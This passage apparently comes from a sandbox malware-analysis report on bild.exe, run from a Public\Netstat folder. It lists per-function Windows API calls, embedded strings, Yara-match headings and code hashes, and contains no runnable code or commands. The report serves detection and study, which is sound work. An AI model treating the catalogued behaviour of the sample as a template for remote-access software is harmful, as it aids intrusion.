                                                                                      • MoveWindow.USER32(8D111939,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA3F5), ref: 110B9228
                                                                                      • SetTimer.USER32(8D111939,0000050D,000007D0,00000000), ref: 110B9260
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoMoveParametersSystemTimerWindow
                                                                                      • String ID: Max
                                                                                      • API String ID: 1521622399-2772132969
                                                                                      • Opcode ID: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                      • Instruction ID: cbc035c590c08491bc6b7e29ca505f880cfdd662cf6ac53e8412c44867f4f71a
                                                                                      • Opcode Fuzzy Hash: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                      • Instruction Fuzzy Hash: EA2130B5A40309AFD714CFA4C885FAFF7B8FB48714F10452EE95597380CA70A941CBA0
                                                                                      Function 110ED0F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindow.USER32(?), ref: 110ED118
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                      • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                      • API String ID: 2577986331-1331251348
                                                                                      • Opcode ID: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                      • Instruction ID: a6e56e2616b3f757a7bedb7841b960acd04ffc41865bfa7298ab7df9715bb4c1
                                                                                      • Opcode Fuzzy Hash: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                      • Instruction Fuzzy Hash: 85F02735F02126BBC6228E579C09F8EB378CF90BACF0200A4F81C26140E734B51082D5
                                                                                      Function 11061140 Relevance: 6.1, APIs: 4, Instructions: 131registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                      • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 110612D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EnumValue$CloseOpen
                                                                                      • String ID:
                                                                                      • API String ID: 3785232357-0
                                                                                      • Opcode ID: 7715bebcec98b19269c8f2ceb66aa64331a88d71416ba02ead887a332bffef31
                                                                                      • Instruction ID: e119b506798adee895546c353bca4cd72f80153627c59e78ac85c5ed933e93b3
                                                                                      • Opcode Fuzzy Hash: 7715bebcec98b19269c8f2ceb66aa64331a88d71416ba02ead887a332bffef31
                                                                                      • Instruction Fuzzy Hash: 14412CB190061E9EDB20CB54CC84FDBBBBDAB89305F0045D9E649D7141EA70AA98CFA0
                                                                                      Function 110291D0 Relevance: 6.1, APIs: 4, Instructions: 104sleepthreadwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateThread.KERNEL32(00000000,00001000,11027030,00000000,00000000,111ED468), ref: 110291F3
                                                                                      • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029212
                                                                                      • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029234
                                                                                      • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102923C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: SleepThread$CreateMessagePost
                                                                                      • String ID:
                                                                                      • API String ID: 3347742789-0
                                                                                      • Opcode ID: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                      • Instruction ID: 6c329cfe7713c70c74540dd837a6755ec0a493dd99a0e0f492d5b7c5eaff94cf
                                                                                      • Opcode Fuzzy Hash: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                      • Instruction Fuzzy Hash: E831D476D42230ABD602DBDCCC80FAABBA8A755758F914134F9395B6C8D6717805CBD0
                                                                                      Function 110B3340 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(0000002C,A1BC2D8B,?,?,00000000,00000000,00000000,Function_00182078,000000FF,?,1103D571,?,A1BC2D8B,?,?,00000000), ref: 110B336F
                                                                                      • LeaveCriticalSection.KERNEL32(0000002C,?,1103D571,?,A1BC2D8B,?,?,00000000,?,00000015,00000000), ref: 110B338E
                                                                                      • SetEvent.KERNEL32(?,?,?,1103D571,?,A1BC2D8B,?,?,00000000,?,00000015,00000000), ref: 110B33D4
                                                                                      • LeaveCriticalSection.KERNEL32(0000002C,?,?,1103D571,?,A1BC2D8B,?,?,00000000,?,00000015,00000000), ref: 110B33DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$EnterEvent
                                                                                      • String ID:
                                                                                      • API String ID: 3394196147-0
                                                                                      • Opcode ID: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                      • Instruction ID: 2836c68be1e173ca97a40bbc94208784cbdba460b006acea4806f33579668287
                                                                                      • Opcode Fuzzy Hash: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                      • Instruction Fuzzy Hash: 6221DF76A087089FD315CFA8D884B9AF7E8FB4C715F008A2EE816C7640DB79B404CB94
                                                                                      Function 110071A5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
                                                                                      • SetFocus.USER32(?), ref: 11007353
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                      • String ID: edit
                                                                                      • API String ID: 1305092643-2167791130
                                                                                      • Opcode ID: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                      • Instruction ID: cb86e9af08271205595a6f41abc8b2cb286fac045a185d6d6013f354b30fec65
                                                                                      • Opcode Fuzzy Hash: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                      • Instruction Fuzzy Hash: 8951B1B6A00606AFE741CF64CC80BABB7E5FB88354F15816DF955C7340EB34E9428B61
                                                                                      Function 110091F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                                                      • _memmove.LIBCMT ref: 110092B6
                                                                                        • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                      • String ID: string too long
                                                                                      • API String ID: 2168136238-2556327735
                                                                                      • Opcode ID: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                      • Instruction ID: 8571876bfdcccba51c928a6a288fcd5c1e124ad980ef247a8f71a2e078b75a0c
                                                                                      • Opcode Fuzzy Hash: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                      • Instruction Fuzzy Hash: A731C732B14A104BF720DE9CE88095FF7EDEBE57A4B20061FE599C7640E7719C5083A1
                                                                                      Function 11041350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 11041413
                                                                                      • __CxxThrowException@8.LIBCMT ref: 11041421
                                                                                      Strings
                                                                                      • VolumeControl exception : %hs, xrefs: 11041431
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                      • String ID: VolumeControl exception : %hs
                                                                                      • API String ID: 3728558374-910296547
                                                                                      • Opcode ID: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                      • Instruction ID: 3351f46422f9e7833a0dd597507e069f064f33e0319a204fc915276dbd9183a5
                                                                                      • Opcode Fuzzy Hash: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                      • Instruction Fuzzy Hash: A721E775F006059FCF01CF65C890BFEF7E8EB49609FA085A9E81697A40DB35B904CBA1
                                                                                      Function 111471A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                        • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                      • _memmove.LIBCMT ref: 11147211
                                                                                      Strings
                                                                                      • Failed to get callstack, xrefs: 111471BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CurrentFileModuleNameProcess_memmove
                                                                                      • String ID: Failed to get callstack
                                                                                      • API String ID: 4135527288-766476014
                                                                                      • Opcode ID: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                      • Instruction ID: 4fb2fbc616631b5574b6180649b942946bf04768c5170edb731833e4cde01d29
                                                                                      • Opcode Fuzzy Hash: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                      • Instruction Fuzzy Hash: D3219875A0011D9BCB14DF64DD94BAEB3B9EF8871CF1041AAEC0DA7240DB31AE54CB90
                                                                                      Function 110D1370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                      • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                      • API String ID: 175691280-2052047905
                                                                                      • Opcode ID: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                      • Instruction ID: 95fe0cd820de1796fd70713afb7a02e85a0165c228f84a05359d3cb2f5b90ec5
                                                                                      • Opcode Fuzzy Hash: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                      • Instruction Fuzzy Hash: 4FF0A47AA0025CBBCB00DEA5DD40BEEFBBD9B45248F044199E608A7140DE706A45C7A5
                                                                                      Function 11029170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • CreateThread.KERNEL32(00000000,00000000,11026ED0,00000000,00000000,00000000), ref: 110291BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
